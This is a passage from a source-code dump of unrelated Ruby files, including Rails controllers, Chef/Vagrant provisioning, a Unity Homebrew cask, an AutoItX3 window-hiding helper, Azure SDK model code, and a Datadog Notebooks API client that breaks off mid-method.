"scheduled" : "") page << "$('width-#{@task.dom_id}').setStyle({ backgroundColor:'#{gantt_color(@task)}'});" end milestones = { } @displayed_tasks.each do |t| page << "$('offset-#{t.dom_id}').setStyle({ left:'#{gantt_offset(@start[t.id])}'});" page << "$('width-#{t.dom_id}').setStyle({ width:'#{gantt_width(@start[t.id],@end[t.id])}'});" page << "$('width-#{t.dom_id}').setStyle({ backgroundColor:'#{gantt_color(t)}'});" milestones[t.milestone_id] = t.milestone if t.milestone_id.to_i > 0 end milestones.values.each do |m| page.replace_html "duration-#{m.dom_id}", worked_nice(m.duration) if m.scheduled_date page << "$('offset-due-#{m.dom_id}').setStyle({ left:'#{gantt_offset(m.scheduled_date.midnight.to_time)}'});" else page << "$('offset-due-#{m.dom_id}').setStyle({ left:'#{gantt_offset(@milestone_end[m.id])}'});" end page << "$('offset-#{m.dom_id}').setStyle({ left:'#{gantt_offset(@milestone_start[m.id])}'});" page << "$('offset-#{m.dom_id}').setStyle({ width:'#{gantt_width(@milestone_start[m.id], @milestone_end[m.id]).to_i + 500}px'});" page << "$('width-#{m.dom_id}').setStyle({ width:'#{gantt_width(@milestone_start[m.id], @milestone_end[m.id])}'});" end end end def gantt_dragging begin if params[:id].include?('-due-') @milestone = Milestone.find(params[:id].split("-").last, :conditions => ["milestones.project_id IN (#{current_project_ids})"] ) else @task = Task.find(params[:id].split("-").last, :conditions => ["tasks.project_id IN (#{current_project_ids}) AND tasks.company_id = '#{current_user.company_id}'"] ) end rescue render :nothing => true return end x = params[:x].to_i x = 0 if x < 0 start_date = Time.now.utc.midnight + (x / 16).days end_date = start_date + ((params[:w].to_i - 501)/16).days + 1.day if @milestone @milestone.scheduled_at = tz.local_to_utc(start_date.to_time + 1.day - 1.minute) unless start_date.nil? render :update do |page| page["due-#{@milestone.dom_id}"].value = (@milestone.scheduled_at ? @milestone.scheduled_at.strftime_localized(current_user.date_format) : "") page["due-#{@milestone.dom_id}"].className = ((@milestone.scheduled? && @milestone.scheduled_at != @milestone.due_at) ? "scheduled" : "") end else @task.scheduled_at = tz.local_to_utc(end_date.to_time + 1.day - 1.minute) unless end_date.nil? render :update do |page| page["due-#{@task.dom_id}"].value = (@task.scheduled_at ? @task.scheduled_at.strftime_localized(current_user.date_format) : "") page["due-#{@task.dom_id}"].className = ((@task.scheduled? && @task.scheduled_at != @task.due_at) ? "scheduled" : "") end end end def gantt_offset(d) days = (d.to_i - Time.now.utc.midnight.to_i) / 1.day rem = ((d.to_i - Time.now.utc.midnight.to_i) - days.days) / 1.minute w = days * 16.0 + (rem.to_f / current_user.workday_duration) * 16.0 w = 0 if w < 0 "#{w.to_i}px" end def gantt_width(s,e) days = (e.to_i - s.to_i) / 1.day rem = ((e.to_i - s.to_i) - days.days) / 1.minute w = days * 16.0 + (rem.to_f / current_user.workday_duration) * 16.0 w = 2 if w < 2 "#{w.to_i}px" end def gantt_color(t) if t.scheduled_overdue? if t.scheduled? "#f00" else "#f66" end elsif t.scheduled? && t.scheduled_date if @end[t.id] && @end[t.id] > t.scheduled_date.to_time "#f00" elsif t.overworked? "#ff9900" elsif t.started? "#1e7002" else "#00f" end else if t.scheduled_date && @end[t.id] && @end[t.id] > t.scheduled_date.to_time "#f66" elsif t.overworked? "#ff9900" elsif t.started? "#76a670" else "#88f" end end end def filter f = params[:filter] if f.nil? || f.empty? 
|| f == "0" session[:filter_customer] = "0" session[:filter_milestone] = "0" session[:filter_project] = "0" elsif f[0..0] == 'c' session[:filter_customer] = f[1..-1] session[:filter_milestone] = "0" session[:filter_project] = "0" elsif f[0..0] == 'p' session[:filter_customer] = "0" session[:filter_milestone] = "0" session[:filter_project] = f[1..-1] elsif f[0..0] == 'm' session[:filter_customer] = "0" session[:filter_milestone] = f[1..-1] session[:filter_project] = "0" elsif f[0..0] == 'u' session[:filter_customer] = "0" session[:filter_milestone] = "-1" session[:filter_project] = f[1..-1] end [:filter_user, :ignore_hidden].each do |filter| session[filter] = params[filter] end redirect_to :action => 'gantt' end end
33.315534
404
0.578056
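For reference, gantt_offset and gantt_width in the controller above map one working day to 16 pixels. A standalone arithmetic sketch, assuming a workday_duration of 480 minutes (the real value comes from the current user, not from this file):

# Mirrors the arithmetic in gantt_offset for a date 2 days and 240 minutes past today's midnight.
workday_duration = 480                                   # assumed minutes per working day
days = 2                                                 # whole days between the date and today's midnight
rem  = 240                                               # leftover minutes beyond those whole days
w = days * 16.0 + (rem.to_f / workday_duration) * 16.0   # pixels: 32 + 8
puts "#{w.to_i}px"                                       # => "40px"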
4adfef502647bbb16e7b9b867c7999a93ef1484b
2,233
# vagrant-deploy-goapp-ngnix.rb require 'chef/provisioning/vagrant_driver' # Define which Ubuntu image we're going to use and where to download # it from vagrant_box 'precise64' do url 'http://files.vagrantup.com/precise64.box' end # Tell provisioning we want to use Vagrant with_driver 'vagrant' # Tell provisioning to use the Ubuntu image with_machine_options :vagrant_options => { 'vm.box' => 'precise64' } # Define how many app servers we want to provision num_appservers = 2 baseip_prefix = '10.10.10.' baseip_address= 100 machine_batch do ignore_failure true # Create appserver machines 1.upto(num_appservers) do |i| machine "appserver#{i}" do appserver_ip_address = "#{baseip_prefix}%d" % (baseip_address+i) # Tell the vagrant driver to add a private network address to give each machine a unique IP add_machine_options :vagrant_config => ["config.vm.network \"private_network\", ip: \"#{appserver_ip_address}\""].join("\n") # Define which Chef cookbook we want to run on the box # appserver will compile a Go file and then run it to respond to an http request run_list ['recipe[appserver::default]'] end end # Create the front end web server machine 'webserver' do # Tell the vagrant driver to add a private network address to give the machine a unique IP # and to define a port forward so we can test the app webserver_ip_address = "#{baseip_prefix}%d" % (baseip_address) add_machine_options :vagrant_config => ["config.vm.network \"private_network\", ip: \"#{webserver_ip_address}\"", "config.vm.network :forwarded_port, guest: 80, host: 8080"].join("\n") # Pass an attribute to the webserver cookbook to tell it how many app servers we will provision attribute ['vagrant-deploy-goapp-ngnix', 'num_of_app_servers'], num_appservers attribute ['vagrant-deploy-goapp-ngnix', 'base_ip_prefix'], baseip_prefix attribute ['vagrant-deploy-goapp-ngnix', 'base_ip_address'], baseip_address # Define which Chef cookbook we want to run on the box # webserver will install nginx and configure it to load balance requests to the # defined number of app servers run_list ['recipe[webserver::default]'] end end
39.175439
188
0.729512
79be2c23d5b00ad2bc74b9ecdc5a66f1c0087e81
1,000
class SessionsController < ApplicationController def home end def create @user = User.find_by(email: params[:user][:email]) if @user && @user.authenticate(params[:user][:password]) session[:user_id] = @user.id flash[:notice] = "Successfully logged in!" redirect_to user_path(@user) else flash[:alert] = "Invalid credentials, please try again" redirect_to "/login" end end def google_auth @user = User.find_or_create_by(email: auth['info']['email']) do |u| u.name = auth['info']['name'] u.password = SecureRandom.hex end if @user.save session[:user_id] = @user.id redirect_to user_path(@user) else redirect_to '/' end end def destroy session.clear redirect_to root_path end private def auth request.env['omniauth.auth'] end end
22.727273
75
0.546
e973fd5979bdcd1ddae944a64cf906ec8c891e56
2,951
#-- copyright # OpenProject is a project management system. # Copyright (C) 2012-2015 the OpenProject Foundation (OPF) # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License version 3. # # OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows: # Copyright (C) 2006-2013 Jean-Philippe Lang # Copyright (C) 2010-2013 the ChiliProject Team # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # # See doc/COPYRIGHT.rdoc for more details. #++ require 'spec_helper' require 'roar/decorator' describe OpenProject::Plugins::ActsAsOpEngine do subject(:engine) do Class.new(Rails::Engine) do include OpenProject::Plugins::ActsAsOpEngine end end it { is_expected.to respond_to(:name) } it { is_expected.to respond_to(:patches) } it { is_expected.to respond_to(:assets) } it { is_expected.to respond_to(:additional_permitted_attributes) } it { is_expected.to respond_to(:register) } describe '#name' do before do Object.const_set('SuperCaliFragilisticExpialidocious', engine) end describe '#name' do subject { super().name } it { is_expected.to eq 'SuperCaliFragilisticExpialidocious' } end end describe '#extend_api_response' do xit 'should lookup and extend an existing Decorator' do # This test does not work as intended... # The actual work done by :extend_api_response is not performed unless the engine is started # However, it would be green because all attributes of the represented are magically added # to the representer... module API module VTest module WorkPackages class WorkPackageRepresenter < ::Roar::Decorator property :bar end end end end represented_clazz = Struct.new(:foo, :bar) representer = API::VTest::WorkPackages::WorkPackageRepresenter.new(represented_clazz.new) engine.class_eval do extend_api_response(:v_test, :work_packages, :work_package) do property :foo end end expect(representer.to_json).to have_json_path('represented/foo') expect(representer.to_json).to have_json_path('represented/bar') end end end
33.91954
98
0.714334
f8b563bff8e8604453e7103410c3e9945cb20972
1,146
cask '[email protected]' do version '2018.3.4f1,1d952368ca3a' sha256 :no_check url "https://download.unity3d.com/download_unity/1d952368ca3a/MacEditorTargetInstaller/UnitySetup-Facebook-Games-Support-for-Editor-2018.3.4f1.pkg" name 'Facebook Gameroom Build Support' homepage 'https://unity3d.com/unity/' pkg 'UnitySetup-Facebook-Games-Support-for-Editor-2018.3.4f1.pkg' depends_on cask: '[email protected]' preflight do if File.exist? "/Applications/Unity" FileUtils.move "/Applications/Unity", "/Applications/Unity.temp" end if File.exist? "/Applications/Unity-2018.3.4f1" FileUtils.move "/Applications/Unity-2018.3.4f1", '/Applications/Unity' end end postflight do if File.exist? '/Applications/Unity' FileUtils.move '/Applications/Unity', "/Applications/Unity-2018.3.4f1" end if File.exist? '/Applications/Unity.temp' FileUtils.move '/Applications/Unity.temp', '/Applications/Unity' end end uninstall quit: 'com.unity3d.UnityEditor5.x', delete: '/Applications/Unity-2018.3.4f1/PlaybackEngines/Facebook' end
31.833333
149
0.719895
1d12eb25e5ebe3965e2d042ed4049b3ab6a2a0de
1,906
require 'spec_helper' RSpec.describe Information, :type => :model do it "url" do information = create :information expect(information.url).to eq("#{Settings.host}/information/#{information.id}") end it "belongs to coupon and favorited" do coupon = create :coupon, count: 0 expect(coupon.information.is_coupon_taken?).to eq(true) end it "soft delete" do scrip = create :scrip information = scrip.information expect(Information.count).to eq(1) expect(information.is_destroyed?).to eq(false) information.soft_delete expect(Information.count).to eq(0) expect(Information.unscoped.count).to eq(1) information.reload expect(information.is_destroyed?).to eq(true) end it "soft delete | delete favorite" do scrip = create :scrip create :favorite, information: scrip.information expect(Favorite.count).to eq(1) scrip.information.soft_delete expect(Favorite.count).to eq(0) end it "soft delete | delete comments of scrip" do scrip = create :scrip create :comment, scrip: scrip information = scrip.information expect(scrip.comments.count).to eq(1) information.soft_delete expect(scrip.comments.count).to eq(0) end it "increase and decrease count" do information = create :information expect(information.comments_count).to eq(0) information.increase_for :comments_count expect(information.comments_count).to eq(1) information.decrease_for :comments_count expect(information.comments_count).to eq(0) end it "could not decrease below 0" do information = create :information expect(information.comments_count).to eq(0) information.increase_for :comments_count expect(information.comments_count).to eq(1) information.decrease_for :comments_count information.decrease_for :comments_count expect(information.comments_count).to eq(0) end end
30.741935
83
0.726653
4a85f94cfb8904899fbcf6f2d98f589963b252c9
119
require 'test_helper' class ShapeTest < ActiveSupport::TestCase # test "the truth" do # assert true # end end
14.875
41
0.697479
bfd6d615800f1daf0ce808ba27da61acb8c9ea0f
999
require 'json' filename = 'callnumber_map.properties' callnumbers = {} callhierarchy = {} line_num=0 text=File.open(filename).read text.each_line do |line| if line_num >= 4 vals = line.split("=") #puts vals.to_s if(vals.length == 2) key = vals[0].strip callnumbers[key] = vals[1].strip.gsub("\n","") #if key has length 2, and matching parent key does not exist, then create parent key if(key.length == 1 && ! callhierarchy.key?(key)) callhierarchy[key] = [] end if(key.length >= 2) keyprefix = key[0..0] if(! callhierarchy.key?(keyprefix)) callhierarchy[keyprefix] = [] end keyval = key[0..1] if ! callhierarchy[keyprefix].include?(keyval) callhierarchy[keyprefix] << keyval end end end end line_num += 1 end callkeys = callnumbers.keys #callkeys.each do |key| #end puts callnumbers.to_json puts "hierarchy" puts callhierarchy.to_json
23.785714
90
0.606607
621a901bc098c0bcaa927e0b37b14a8edc1bd11d
362
class RemoveOldPaymentColumnsFromCommunity < ActiveRecord::Migration[5.2] def change remove_column :communities, :commission_from_seller, :integer, after: :vat remove_column :communities, :vat, :integer, after: :facebook_connect_enabled remove_column :communities, :testimonials_in_use, :boolean, after: :minimum_price_cents, default: true end end
45.25
106
0.79558
289cfd64a738303bdabb1eeda9a836c049f654b3
7,649
# encoding: utf-8 # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::Network::Mgmt::V2020_08_01 module Models # # Private endpoint resource. # class PrivateEndpoint < Resource include MsRestAzure # @return [ExtendedLocation] The extended location of the load balancer. attr_accessor :extended_location # @return [Subnet] The ID of the subnet from which the private IP will be # allocated. attr_accessor :subnet # @return [Array<NetworkInterface>] An array of references to the network # interfaces created for this private endpoint. attr_accessor :network_interfaces # @return [ProvisioningState] The provisioning state of the private # endpoint resource. Possible values include: 'Succeeded', 'Updating', # 'Deleting', 'Failed' attr_accessor :provisioning_state # @return [Array<PrivateLinkServiceConnection>] A grouping of information # about the connection to the remote resource. attr_accessor :private_link_service_connections # @return [Array<PrivateLinkServiceConnection>] A grouping of information # about the connection to the remote resource. Used when the network # admin does not have access to approve connections to the remote # resource. attr_accessor :manual_private_link_service_connections # @return [Array<CustomDnsConfigPropertiesFormat>] An array of custom dns # configurations. attr_accessor :custom_dns_configs # @return [String] A unique read-only string that changes whenever the # resource is updated. attr_accessor :etag # # Mapper for PrivateEndpoint class as Ruby Hash. # This will be used for serialization/deserialization. # def self.mapper() { client_side_validation: true, required: false, serialized_name: 'PrivateEndpoint', type: { name: 'Composite', class_name: 'PrivateEndpoint', model_properties: { id: { client_side_validation: true, required: false, serialized_name: 'id', type: { name: 'String' } }, name: { client_side_validation: true, required: false, read_only: true, serialized_name: 'name', type: { name: 'String' } }, type: { client_side_validation: true, required: false, read_only: true, serialized_name: 'type', type: { name: 'String' } }, location: { client_side_validation: true, required: false, serialized_name: 'location', type: { name: 'String' } }, tags: { client_side_validation: true, required: false, serialized_name: 'tags', type: { name: 'Dictionary', value: { client_side_validation: true, required: false, serialized_name: 'StringElementType', type: { name: 'String' } } } }, extended_location: { client_side_validation: true, required: false, serialized_name: 'extendedLocation', type: { name: 'Composite', class_name: 'ExtendedLocation' } }, subnet: { client_side_validation: true, required: false, serialized_name: 'properties.subnet', type: { name: 'Composite', class_name: 'Subnet' } }, network_interfaces: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.networkInterfaces', type: { name: 'Sequence', element: { client_side_validation: true, required: false, serialized_name: 'NetworkInterfaceElementType', type: { name: 'Composite', class_name: 'NetworkInterface' } } } }, provisioning_state: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.provisioningState', type: { name: 'String' } }, private_link_service_connections: { client_side_validation: true, required: false, serialized_name: 'properties.privateLinkServiceConnections', type: { name: 'Sequence', element: { 
client_side_validation: true, required: false, serialized_name: 'PrivateLinkServiceConnectionElementType', type: { name: 'Composite', class_name: 'PrivateLinkServiceConnection' } } } }, manual_private_link_service_connections: { client_side_validation: true, required: false, serialized_name: 'properties.manualPrivateLinkServiceConnections', type: { name: 'Sequence', element: { client_side_validation: true, required: false, serialized_name: 'PrivateLinkServiceConnectionElementType', type: { name: 'Composite', class_name: 'PrivateLinkServiceConnection' } } } }, custom_dns_configs: { client_side_validation: true, required: false, serialized_name: 'properties.customDnsConfigs', type: { name: 'Sequence', element: { client_side_validation: true, required: false, serialized_name: 'CustomDnsConfigPropertiesFormatElementType', type: { name: 'Composite', class_name: 'CustomDnsConfigPropertiesFormat' } } } }, etag: { client_side_validation: true, required: false, read_only: true, serialized_name: 'etag', type: { name: 'String' } } } } } end end end end
33.995556
84
0.469473
626827e26329dd96f2aa85e666d72dc5c6173719
2,297
# An instance of this class represents an AutoItX3 WIN32OLE server.
class AutoItX3
  HIDING_TIMEOUT = 10 # in seconds
  BROWSER_WINDOW_NAME = 'YouTube - Google Chrome'
  SW_HIDE = 0
  SW_SHOW = 5

  def initialize
    @server = WIN32OLE.new('AutoItX3.Control')
    # set matching option for window title, 2 is match substring, 3 is match exact, 1 is match from the beginning
    @server.opt('WinTitleMatchMode', 3)
  end

  # Find the browser handler, and hide it.
  def hide_browser
    # acquire window handler if needed
    if(!@browser_handler)
      acquire_browser_handler()
    end
    @server.WinSetState(@browser_handler, '', SW_HIDE)
  end

  # Shows the browser if it's hidden. Is supposed that @browser_handler was already acquired.
  def show_browser
    @server.WinSetState(@browser_handler, '', SW_SHOW)
  end

  def hide_chromedriver_console
    # acquire window handler if needed
    if(!@chromedriver_console_handler)
      acquire_chromedriver_console_handler()
    end
    @server.WinSetState(@chromedriver_console_handler, '', SW_HIDE)
  end

  private

  # Force the acquirement of the corresponding @browser_handler. Overwrite existing if exists.
  def acquire_browser_handler
    # priority is to hide it quicker as you can
    if(@server.WinWait(BROWSER_WINDOW_NAME, '', HIDING_TIMEOUT) == 1)
      # connection has been made, get handler
      pseudo_handle = @server.WinGetHandle(BROWSER_WINDOW_NAME)
      @browser_handler = "[HANDLE:#{pseudo_handle}]" #: String
    else
      # connection couldn't be made
      raise(RuntimeError, "AutoItX3 can't find '#{BROWSER_WINDOW_NAME}' window.")
    end
  end

  # Force the acquirement of the corresponding @chromedriver_console_handler. Overwrite existing if exists.
  def acquire_chromedriver_console_handler
    # priority is to hide it quicker as you can
    if(@server.WinWait((window_name = "#{YouTubePlayer::TARGET_CHROMEDRIVER_PLACEMENT.gsub('/', '\\')}\\chromedriver.exe"), '', HIDING_TIMEOUT) == 1)
      # connection has been made, get handler
      pseudo_handle = @server.WinGetHandle(window_name)
      @chromedriver_console_handler = "[HANDLE:#{pseudo_handle}]" #: String
    else
      # connection couldn't be made
      raise(RuntimeError, "AutoItX3 can't find '#{window_name}' window.")
    end
  end
end
35.890625
149
0.719634
91e23ae2c7f93ca6e355dba30855c44287ac2912
2,543
module Fog module Compute class AzureRM # Real class for Compute Request class Real def list_managed_disks_in_subscription msg = 'Listing all Managed Disks' Fog::Logger.debug msg begin managed_disks = @compute_mgmt_client.disks.list rescue MsRestAzure::AzureOperationError => e raise_azure_exception(e, msg) end Fog::Logger.debug 'Managed Disks listed successfully.' managed_disks end end # Mock class for Compute Request class Mock def list_managed_disks_in_subscription disks = [ { 'accountType' => 'Standard_LRS', 'properties' => { 'osType' => 'Windows', 'creationData' => { 'createOption' => 'Empty' }, 'diskSizeGB' => 10, 'encryptionSettings' => { 'enabled' => true, 'diskEncryptionKey' => { 'sourceVault' => { 'id' => '/subscriptions/{subscriptionId}/resourceGroups/myResourceGroup/providers/Microsoft.KeyVault/vaults/myVMVault' }, 'secretUrl' => 'https://myvmvault.vault-int.azure-int.net/secrets/{secret}' }, 'keyEncryptionKey' => { 'sourceVault' => { 'id' => '/subscriptions/{subscriptionId}/resourceGroups/myResourceGroup/providers/Microsoft.KeyVault/vaults/myVMVault' }, 'keyUrl' => 'https://myvmvault.vault-int.azure-int.net/keys/{key}' } }, 'timeCreated' => '2016-12-28T02:46:21.3322041+00:00', 'provisioningState' => 'Succeeded', 'diskState' => 'Unattached' }, 'type' => 'Microsoft.Compute/disks', 'location' => 'westus', 'tags' => { 'department' => 'Development', 'project' => 'ManagedDisks' }, 'id' => '/subscriptions/{subscriptionId}/resourceGroups/myResourceGroup/providers/Microsoft.Compute/disks/myManagedDisk1', 'name' => 'myManagedDisk1' } ] disk_mapper = Azure::Profiles::Latest::Compute::Models::DiskList.mapper @compute_mgmt_client.deserialize(disk_mapper, disks, 'result.body').value end end end end end
37.955224
140
0.506095
7914e1e470faa1654dd4bd33ab471826023ba1c5
18,183
=begin #Datadog API V1 Collection #Collection of all Datadog Public endpoints. The version of the OpenAPI document: 1.0 Contact: [email protected] Generated by: https://openapi-generator.tech Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License. This product includes software developed at Datadog (https://www.datadoghq.com/). Copyright 2020-Present Datadog, Inc. =end require 'cgi' module DatadogAPIClient::V1 class NotebooksAPI attr_accessor :api_client def initialize(api_client = APIClient.default) @api_client = api_client end # Create a notebook # Create a notebook using the specified options. # @param body [NotebookCreateRequest] The JSON description of the notebook you want to create. # @param [Hash] opts the optional parameters # @return [NotebookResponse] def create_notebook(body, opts = {}) data, _status_code, _headers = create_notebook_with_http_info(body, opts) data end # Create a notebook # Create a notebook using the specified options. # @param body [NotebookCreateRequest] The JSON description of the notebook you want to create. # @param [Hash] opts the optional parameters # @return [Array<(NotebookResponse, Integer, Hash)>] NotebookResponse data, response status code and response headers def create_notebook_with_http_info(body, opts = {}) if @api_client.config.unstable_operations.has_key?(:create_notebook) unstable_enabled = @api_client.config.unstable_operations[:create_notebook] if unstable_enabled @api_client.config.logger.warn format("Using unstable operation '%s'", "create_notebook") else raise APIError.new(message: format("Unstable operation '%s' is disabled", "create_notebook")) end end if @api_client.config.debugging @api_client.config.logger.debug 'Calling API: NotebooksAPI.create_notebook ...' end # verify the required parameter 'body' is set if @api_client.config.client_side_validation && body.nil? fail ArgumentError, "Missing the required parameter 'body' when calling NotebooksAPI.create_notebook" end # resource path local_var_path = '/api/v1/notebooks' # query parameters query_params = opts[:query_params] || {} # header parameters header_params = opts[:header_params] || {} # HTTP header 'Accept' (if needed) header_params['Accept'] = @api_client.select_header_accept(['application/json']) # HTTP header 'Content-Type' header_params['Content-Type'] = @api_client.select_header_content_type(['application/json']) # form parameters form_params = opts[:form_params] || {} # http body (model) post_body = opts[:debug_body] || @api_client.object_to_http_body(body) # return_type return_type = opts[:debug_return_type] || 'NotebookResponse' # auth_names auth_names = opts[:debug_auth_names] || [:apiKeyAuth, :appKeyAuth] new_options = opts.merge( :operation => :create_notebook, :header_params => header_params, :query_params => query_params, :form_params => form_params, :body => post_body, :auth_names => auth_names, :return_type => return_type ) data, status_code, headers = @api_client.call_api(:POST, local_var_path, new_options) if @api_client.config.debugging @api_client.config.logger.debug "API called: NotebooksAPI#create_notebook\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}" end return data, status_code, headers end # Delete a notebook # Delete a notebook using the specified ID. # @param notebook_id [Integer] Unique ID, assigned when you create the notebook. 
# @param [Hash] opts the optional parameters # @return [nil] def delete_notebook(notebook_id, opts = {}) delete_notebook_with_http_info(notebook_id, opts) nil end # Delete a notebook # Delete a notebook using the specified ID. # @param notebook_id [Integer] Unique ID, assigned when you create the notebook. # @param [Hash] opts the optional parameters # @return [Array<(nil, Integer, Hash)>] nil, response status code and response headers def delete_notebook_with_http_info(notebook_id, opts = {}) if @api_client.config.unstable_operations.has_key?(:delete_notebook) unstable_enabled = @api_client.config.unstable_operations[:delete_notebook] if unstable_enabled @api_client.config.logger.warn format("Using unstable operation '%s'", "delete_notebook") else raise APIError.new(message: format("Unstable operation '%s' is disabled", "delete_notebook")) end end if @api_client.config.debugging @api_client.config.logger.debug 'Calling API: NotebooksAPI.delete_notebook ...' end # verify the required parameter 'notebook_id' is set if @api_client.config.client_side_validation && notebook_id.nil? fail ArgumentError, "Missing the required parameter 'notebook_id' when calling NotebooksAPI.delete_notebook" end # resource path local_var_path = '/api/v1/notebooks/{notebook_id}'.sub('{' + 'notebook_id' + '}', CGI.escape(notebook_id.to_s)) # query parameters query_params = opts[:query_params] || {} # header parameters header_params = opts[:header_params] || {} # HTTP header 'Accept' (if needed) header_params['Accept'] = @api_client.select_header_accept(['application/json']) # form parameters form_params = opts[:form_params] || {} # http body (model) post_body = opts[:debug_body] # return_type return_type = opts[:debug_return_type] # auth_names auth_names = opts[:debug_auth_names] || [:apiKeyAuth, :appKeyAuth] new_options = opts.merge( :operation => :delete_notebook, :header_params => header_params, :query_params => query_params, :form_params => form_params, :body => post_body, :auth_names => auth_names, :return_type => return_type ) data, status_code, headers = @api_client.call_api(:DELETE, local_var_path, new_options) if @api_client.config.debugging @api_client.config.logger.debug "API called: NotebooksAPI#delete_notebook\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}" end return data, status_code, headers end # Get a notebook # Get a notebook using the specified notebook ID. # @param notebook_id [Integer] Unique ID, assigned when you create the notebook. # @param [Hash] opts the optional parameters # @return [NotebookResponse] def get_notebook(notebook_id, opts = {}) data, _status_code, _headers = get_notebook_with_http_info(notebook_id, opts) data end # Get a notebook # Get a notebook using the specified notebook ID. # @param notebook_id [Integer] Unique ID, assigned when you create the notebook. # @param [Hash] opts the optional parameters # @return [Array<(NotebookResponse, Integer, Hash)>] NotebookResponse data, response status code and response headers def get_notebook_with_http_info(notebook_id, opts = {}) if @api_client.config.unstable_operations.has_key?(:get_notebook) unstable_enabled = @api_client.config.unstable_operations[:get_notebook] if unstable_enabled @api_client.config.logger.warn format("Using unstable operation '%s'", "get_notebook") else raise APIError.new(message: format("Unstable operation '%s' is disabled", "get_notebook")) end end if @api_client.config.debugging @api_client.config.logger.debug 'Calling API: NotebooksAPI.get_notebook ...' 
end # verify the required parameter 'notebook_id' is set if @api_client.config.client_side_validation && notebook_id.nil? fail ArgumentError, "Missing the required parameter 'notebook_id' when calling NotebooksAPI.get_notebook" end # resource path local_var_path = '/api/v1/notebooks/{notebook_id}'.sub('{' + 'notebook_id' + '}', CGI.escape(notebook_id.to_s)) # query parameters query_params = opts[:query_params] || {} # header parameters header_params = opts[:header_params] || {} # HTTP header 'Accept' (if needed) header_params['Accept'] = @api_client.select_header_accept(['application/json']) # form parameters form_params = opts[:form_params] || {} # http body (model) post_body = opts[:debug_body] # return_type return_type = opts[:debug_return_type] || 'NotebookResponse' # auth_names auth_names = opts[:debug_auth_names] || [:apiKeyAuth, :appKeyAuth] new_options = opts.merge( :operation => :get_notebook, :header_params => header_params, :query_params => query_params, :form_params => form_params, :body => post_body, :auth_names => auth_names, :return_type => return_type ) data, status_code, headers = @api_client.call_api(:GET, local_var_path, new_options) if @api_client.config.debugging @api_client.config.logger.debug "API called: NotebooksAPI#get_notebook\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}" end return data, status_code, headers end # Get all notebooks # Get all notebooks. This can also be used to search for notebooks with a particular `query` in the notebook `name` or author `handle`. # @param [Hash] opts the optional parameters # @option opts [String] :author_handle Return notebooks created by the given &#x60;author_handle&#x60;. # @option opts [String] :exclude_author_handle Return notebooks not created by the given &#x60;author_handle&#x60;. # @option opts [Integer] :start The index of the first notebook you want returned. # @option opts [Integer] :count The number of notebooks to be returned. # @option opts [String] :sort_field Sort by field &#x60;modified&#x60; or &#x60;name&#x60;. (default to 'modified') # @option opts [String] :sort_dir Sort by direction &#x60;asc&#x60; or &#x60;desc&#x60;. (default to 'desc') # @option opts [String] :query Return only notebooks with &#x60;query&#x60; string in notebook name or author handle. # @option opts [Boolean] :include_cells Value of &#x60;false&#x60; excludes the &#x60;cells&#x60; and global &#x60;time&#x60; for each notebook. (default to true) # @return [NotebooksResponse] def list_notebooks(opts = {}) data, _status_code, _headers = list_notebooks_with_http_info(opts) data end # Get all notebooks # Get all notebooks. This can also be used to search for notebooks with a particular &#x60;query&#x60; in the notebook &#x60;name&#x60; or author &#x60;handle&#x60;. # @param [Hash] opts the optional parameters # @option opts [String] :author_handle Return notebooks created by the given &#x60;author_handle&#x60;. # @option opts [String] :exclude_author_handle Return notebooks not created by the given &#x60;author_handle&#x60;. # @option opts [Integer] :start The index of the first notebook you want returned. # @option opts [Integer] :count The number of notebooks to be returned. # @option opts [String] :sort_field Sort by field &#x60;modified&#x60; or &#x60;name&#x60;. # @option opts [String] :sort_dir Sort by direction &#x60;asc&#x60; or &#x60;desc&#x60;. # @option opts [String] :query Return only notebooks with &#x60;query&#x60; string in notebook name or author handle. 
# @option opts [Boolean] :include_cells Value of &#x60;false&#x60; excludes the &#x60;cells&#x60; and global &#x60;time&#x60; for each notebook. # @return [Array<(NotebooksResponse, Integer, Hash)>] NotebooksResponse data, response status code and response headers def list_notebooks_with_http_info(opts = {}) if @api_client.config.unstable_operations.has_key?(:list_notebooks) unstable_enabled = @api_client.config.unstable_operations[:list_notebooks] if unstable_enabled @api_client.config.logger.warn format("Using unstable operation '%s'", "list_notebooks") else raise APIError.new(message: format("Unstable operation '%s' is disabled", "list_notebooks")) end end if @api_client.config.debugging @api_client.config.logger.debug 'Calling API: NotebooksAPI.list_notebooks ...' end # resource path local_var_path = '/api/v1/notebooks' # query parameters query_params = opts[:query_params] || {} query_params[:'author_handle'] = opts[:'author_handle'] if !opts[:'author_handle'].nil? query_params[:'exclude_author_handle'] = opts[:'exclude_author_handle'] if !opts[:'exclude_author_handle'].nil? query_params[:'start'] = opts[:'start'] if !opts[:'start'].nil? query_params[:'count'] = opts[:'count'] if !opts[:'count'].nil? query_params[:'sort_field'] = opts[:'sort_field'] if !opts[:'sort_field'].nil? query_params[:'sort_dir'] = opts[:'sort_dir'] if !opts[:'sort_dir'].nil? query_params[:'query'] = opts[:'query'] if !opts[:'query'].nil? query_params[:'include_cells'] = opts[:'include_cells'] if !opts[:'include_cells'].nil? # header parameters header_params = opts[:header_params] || {} # HTTP header 'Accept' (if needed) header_params['Accept'] = @api_client.select_header_accept(['application/json']) # form parameters form_params = opts[:form_params] || {} # http body (model) post_body = opts[:debug_body] # return_type return_type = opts[:debug_return_type] || 'NotebooksResponse' # auth_names auth_names = opts[:debug_auth_names] || [:apiKeyAuth, :appKeyAuth] new_options = opts.merge( :operation => :list_notebooks, :header_params => header_params, :query_params => query_params, :form_params => form_params, 